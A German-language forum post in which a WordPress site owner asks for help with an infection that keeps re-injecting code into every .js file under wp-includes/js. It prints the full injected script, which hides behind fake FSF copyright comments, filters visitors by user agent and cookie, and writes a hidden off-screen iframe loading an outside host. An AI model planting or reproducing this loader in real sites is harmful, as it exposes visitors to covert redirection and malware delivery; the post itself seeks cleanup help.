Hallo.
Ich kämpfe seit gestern mit einer Schadsoftware die zwei WP Installationen (beide auf dem aktuellsten Stand) befallen hat. Beide befinden sich im selben Serververzeichnis, eine dritte Wp Installation - die eine Eben höher liegt - ist nicht betroffen.
Es handelt sich meiner Meinung nach um eine Art Traffic HighJacking, und zwar wird in jede .js Datei im js Ordner des wp-include Verzeichnisses eine Funktion kopiert un diese Aufgerufen.
Wenn ich es richtig interpretiere öffnet diese Funktion ein Iframe aßerhalb des Bildschirms (X und Y jeweils mit - versehen).
Natürlich hilft das einfache entfernen ders Codes nichts, er kommt innerhalb von Minuten wieder (alle Dateien sind 644 berechtigt). Allerdings variiert der Code dann etwas, es werden z.B. der Name der Funktion sowie die InhaltsURL des IFrame geändert.
Ich kann leider keine "unnatürlichen" Zeitpunkte finden sowie keine zusätzlichen Dateien usw.
Ich werde heute Abend mal frische CoreFiles aufspielen, würde aber gerne evtl. noch Tipps und Erfahrungen eurerseits abgreifen.
Sucht man nach "Broadbandserviceactu" bei google
findet man jede Menge Seiten die infiziert sind - wo der Code aber mit ausgegeben wird. Leider findet man keine Lösungen (ich jedenfalls nicht).
Das hier ist der Code der in jede .js Datei copiert wird.
/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function getCookie(name) {
var matches = document.cookie.match(new RegExp(
"(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
function Broadbandserviceactu() {
var resiser = navigator.userAgent;
var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > -1 || resiser.indexOf("Windows NT 6.2") > -1);
var buble = (getCookie("joombanight") === undefined);
if (!teamfact && buble) {
document.write('<iframe src="http://puperlikis.pristinegraphene.com/aplodisment15.html?%a" style="border-left: thick double 7FFFD4;left: -887px;position: absolute;cursor: help;border-right: thick double 0000FF;top: -887px;" height="132" width="132"></iframe>');
var date = new Date( new Date().getTime() + 64*60*60*1000 );
document.cookie="joombanight=1; path=/; expires="+date.toUTCString();
}
}
Broadbandserviceactu();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/
Alles anzeigen